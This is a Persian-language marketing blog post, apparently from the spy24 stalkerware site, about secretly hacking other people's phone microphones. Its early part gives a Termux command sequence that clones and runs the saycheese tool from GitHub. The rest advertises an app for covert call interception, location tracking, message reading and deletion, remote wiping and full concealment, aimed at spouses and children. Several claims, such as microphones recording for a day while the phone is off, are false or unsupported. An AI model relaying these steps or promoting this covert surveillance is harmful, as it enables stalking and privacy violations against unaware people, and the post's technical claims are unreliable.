دسته‌بندی نشده

هک میکروفون گوشی دیگران

به طور کلی هک میکروفون گوشی دیگران از جمله بزرگ ترین دغدغه های فناوری است. بدون شک هر تلفن همراه یک میکروفون دارد که می توانید از طریق آن صدا را بشنوید یا صدای خود را به راحتی به شخص دیگری منتقل نمایید. این میکروفون بسیار حساس بوده و عامل اصلی گوش دادن به مکالمات موبایلی دیگران است.

از این رو می توانید گفتار افراد دیگر را کنترل کنید. خوب است بدانید که گوش دادن به مکالمات تلفن همراه دیگران یک جرم است و مجازات آن سنگین است. از این رو ما در این مقاله از سامانه مراقبت از خانواده spy24 قصد داریم تا شما را با آموزش هک میکروفن گوشی با ترموکس آشنا کنیم.

آموزش هک میکروفون گوشی دیگران با ترموکس

استراق سمع و هک میکروفون گوشی افراد دیگر اغلب جرم است ولی در مواقعی ممکن است که برای شما نیاز باشد. به عنوان مثال قصد دارید تا صحبت های فرزندان خود گوش دهید تا در دنیای خطرناک مجازی از آن ها مراقبت نمایید و آن ها را کنترل و محافظت نمایید.

در حدود 90 درصد از مردم زمانی که صحبت از گوش دادن به تلفن همراه و هک میکروفون گوشی دیگران می شود، فکرشان به سمت ضبط صوت برای ثبت کردن مکالمات می رود. در صورتی که این روش بسیار قدیمی است و در سال 2022 روش های دیگری وجود دارد ولی می توان از آن برای گوش دادن به صحبت های دیگران استفاده کرد.

امروزیکی از روش های که شما می توانید به واسطه آن فعالیت خانواده، فرزند یا همسر خود را نظارت کنید، هک میکروفن گوشی با ترموکس می باشد؛ که در ادامه برای شما دستورات این ابزار را قرار می دهیم. به ترتیب دستورات زیر را در برنامه ترموکس وارد نمایید:

 1.  pkg update
 2.  pkg install git
 3.  pkg install php
 4.  pkg install openssh
 5.  git clone http://github.com/thelinuxchoice/saycheese
 6.  ls
 7. cd saycheese
 8.  ls
 9.  chmod +x saycheese.sh
 10. bash saycheese.sh
هک میکروفون گوشی دیگران با ترموکس

آیا امکان گوش دادن از راه دور به مکالمات تلفن همراه دیگران عملی است؟

آیا شما با سودهای زیادی که کمپانی های سازنده تلفن همراه دارند، فکر کرده اید. شرکت های تولید تلفن همراه برای انجام فعالیت های گوناگون مثل فعال کردن میکروفون تلفن همراه برای هک میکروفون گوشی دیگران یا فعال کردن برنامه ها قبل از تحویل دادن گوشی، پول زیادی از شرکت های گوناگون می گیرند.

از جمله این هزینه هابرای فعال کردن میکروفون تلفن همراه شارژ می شود. با روشن بودن میکروفون موبایل، به راحتی می توانید اقدام به گوش دادن از راه دور را در تلفن همراه خود فعال نمایید.

میکروفون یک قطعه بسیار حساسی است که حتی اگر تلفن همراه شما خاموش باشد و از سیم کارت در تلفن همراه خود استفاده نمایید، به مدت 24 ساعت زمان دارید تا صدا را ضبط نمایید.

چگونه میکروفون گوشی دیگران را فعال کنیم؟

از طریق برنامه SPY24 می توانید به صورت کاملا خودکار پیامی مثل نوتیفیکیشن برای فعال کردن میکروفون گوشی دیگران طراحی نمایید. این اعلان به روش های گوناگونی به تلفن همراه مورد نظر ارسال شده و در صورتی که فرد مورد نظر به یکی از اعلان ها پاسخ دهد میکروفون گوشی آن برای شما فعال می شود.

بعضی از افراد این گونه فکر می کنند که وقتی میکروفن شنود برای هک میکروفون گوشی دیگران روشن است، مکالمات موبایلی دیگران محدود می شود. ولی در صورتی که شما موفق به روشن کردن میکروفون گوشی فردی شوید؛ هیچ محدودیتی برای گوش دادن به مکالمه او وجود ندارد. تلفن همراه شما همچنین می توانید اطلاعات بیشتری را از گوشی آن دریافت کند.

بهترین برنامه برای هک میکروفون گوشی دیگران

اگر شما علاقه مند به گوش دادن به مکالمات موبایلی دیگران هستید و راهی مطمئن برای گوش دادن مکالمات دیگران از راه دور می خواهید؛ برنامه ای برای شما در سایت وجود دارد که می توانید با نصب این برنامه به سادگی اعلان خود را ایجاد کنید. از قابلیت های برنامه spy24 این است که شما از طریق آن نه تنها به مکالمات تلفن همراه افراد دیگران گوش می دهید، بلکه امکان دسترسی به تمام اطلاعات مربوط به تلفن همراه و موقعیت مکانی شخص مورد نظر نیز فراهم می شود.

لازم به ذکر است که دانلود این برنامه برای شما رایگان بوده و هیچ آسیبی به دستگاه شما و دستگاه مورد نظر وارد نمی کند. در ضمن هدف اصلی از ساخت آن کنترل والدین بر فعالیت فرزندان بوده و آن ها دارای مجوز قانونی برای انجام این کار هستند.

بهترین برنامه هک کردن میکروفون گوشی

ویژگی های توقف تماس

 • می توانید گوشی مورد نظر خود را ردیابی نمایید و از محل حضور آن مطلع شوید.
 • گوش دادن به مکالمات موبایلی دیگران بدون محدودیت می باشد.
 • امکان حذف از راه دور اطلاعات گوشی هدف بدون اطلاع کاربر است.
 • کنترل کامل صورت می گیرد.
 • دسترسی کامل به تمامی پیامک های گوشی، امکان ارسال یا حذف پیامک نیز وجود دارد.
 • امکان دسترسی به مخاطبین کاربر و ایجاد بلاک برای هر کاربری در تماس یا پیامک است.
 • امکان بازدید از وب سایت هایی که کاربر دنبال می کند.

این برنامه می تواند به عنوان بهترین برنامه برای شنود مکالمات تلفن همراه دیگران یا هک میکروفون گوشی دیگران معرفی شود و به شما امکان دسترسی کامل به تلفن همراه کاربر را بدهد.

نرم افزار هک میکروفن گوشی را از کجا بخریم؟

سایت اسپای 24 به عنوان معتبرترین سایت های گوگل می باشد که لینک دانلود نرم افزار را برای گوش دادن مستقیم به مکالمات موبایلی دیگران در اختیار شما می دهد. برای دانلود کافی است نام سایت را در گوگل جستجو کرده و سپس روی لینک آپلود شده در سایت کلیک نمایید.

چه مدت می توان به مکالمات گوش داد؟

در بعضی از برنامه های استراق سمع، اپلیکیشن با استفاده از موقعیت مکانی کار می کند و دارای محدودیت است. به عنوان مثال اگر بیش از 100 کیلومتر با آن فرد فاصله داشته باشید، دیگر قادر به گوش دادن مکالمات وی نیستید؛ زیرا دایره ارتباطی خارج از برنامه می باشد. از عیب های این برنامه فقط محدودیت به فضا نیست، زمانی که ارتباط با تلفن همراه قطع می شود، ممکن است دیگر نتوانید به گوشی وصل شده و تمامی عملکردهای تلفن همراه شما محدود خواهد شد.

اما اپلیکیشن طراحی شده توسط سایت اسپای 24 برای هک میکروفون گوشی دیگران یک اپلیکیشن عالی است که برای عملکرد به هیچ محدودیت جغرافیایی وابسته نمی باشد. این اپلیکیشن به گونه ای است که می توانید گوشی موبایل یک فرد را حتی در کشور دیگری بررسی و استعلام نمایید. از این طریق به راحتی دنیا را در حلقه ارتباطی خودتان برای شنود مکالمات موبایلی دیگران قرار دهید.

آیا امکان ضبط مکالمات با تلفن وجود دارد؟

زمانی که برنامه را بر روی گوشی خود نصب کنید، بخش کاملی از این برنامه برای گوش دادن در دسترس است. با ورود به این بخش شماره تلفن تماس گیرندگان را در لیست آخرین تماس مشاهده کرده و روی هر کدام که کلیک کنید تماس ذخیره شده برای شما اجرا خواهد شد.

آیا ممکن است کاربر متوجه عملکرد ما شود؟

بسیاری از والدین و کاربران نگران هستند که کاربر مورد نظر متوجه عملکرد هک میکروفون گوشی دیگران شود. ولی لازم به ذکر است که این برنامه با چشم غیرمسلح قابل مشاهده نیست و کاربر تحت هیچ شرایطی قادر به یافتن برنامه نیست. حتی اگر تلفن همراه با اجرای سخت افزار یا نرم افزار تجاری بررسی شود، از وجود این برنامه بر روی تلفن همراه مطلع نمی شوید.

هک میکروفون گوشی از راه دور

برخی از ویژگی های برنامه SPY24 :

 1. تماس ها و پیام های متنی را با تاریخ و زمان نظارت کنید؛
 2. کنترل تلگرام، کنترل اینستاگرام، کنترل واتس اپ و …؛
 3. موقعیت مکانی فوری و مسیرهای پیموده شده پیوسته؛
 4. وب سایت های بازدید شده و برنامه های اجرا شده؛
 5. با قابلیت مخفی سازی 100% برنامه و مدیریت از راه دور؛
 6. امکان مسدود کردن وب سایت ها، برنامه ها و مخاطبین از راه دور.

نتیجه گیری

اولین و مهم ترین قوانین سایت و یا شرکت در هک گوشی این است  که هر نوع سواستفاده از آموزش ها و برنامه های وب سایت SPY24 به عهده کاربر است. spy24 نام یک اپلیکیشن موبایلی بسیار ساده برای نصب و فعال سازی می باشد که به والدین امکان کنترل و مدیریت فعالیت های فرزندان خود در شبکه های مجازی موبایل می دهد. هدف این مقاله آموزش هک میکروفن گوشی دیگران با ترموکس است که برای گوش دادن به مکالمات دیگران حتی نیازی به دسترسی به تلفن یک شخص نیست.

برگرفته از:www.consumerreports.org

کلیس آندره

کلیس آندره، نامی که در دنیای امنیت شبکه به عنوان یک نویسنده و پژوهشگر برجسته شناخته می‌شود. او با انگیزه و تعهد عمیق به حفظ امنیت در دنیای دیجیتال، در حال تألیف مقالاتی برای وب‌سایت‌ها و منابع تخصصی می‌باشد. تخصص اصلی کلیس آندره در زمینه امنیت شبکه و فناوری‌های اطلاعاتی قرار دارد. او با داشتن دانش گسترده‌ای در مباحث مختلف امنیت شبکه از جمله رمزنگاری، نفوذ و تشخیص تهدیدات، توانسته است مقالاتی با محتوای غنی و عمیق تولید کند. با تجربه‌های متعدد و تحقیقات گسترده در زمینه امنیت شبکه، کلیس توانسته است راهکارها و راهنماهای مؤثری را برای مدیران سیستم، توسعه‌دهندگان نرم‌افزار و افراد علاقه‌مند به امنیت دیجیتال ارائه دهد. مقالات او به عنوان منابع معتبر در زمینه امنیت شبکه شناخته می‌شوند. با زبانی ساده و قابل فهم، کلیس توانسته است مفاهیم پیچیده امنیت شبکه را برای عموم مخاطبان تبیین کند. او با تمرکز بر راه‌حل‌های عملی و نکات کلیدی، مخاطبان را در جهت تقویت امنیت شبکه‌های خود هدایت می‌کند. با توجه به تلاش‌های فراوان کلیس آندره در ارتقاء امنیت دیجیتال، مقالات وی به عنوان راهنماهای مهم و ضروری در دنیای پیچیده و پرخطر امنیت شبکه به شمار می‌آیند. او با تأکید بر آگاهی و آموزش، به ارتقاء امنیت دیجیتال جامعه کمک می‌کند و نقش مهمی در این زمینه ایفا می‌نماید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا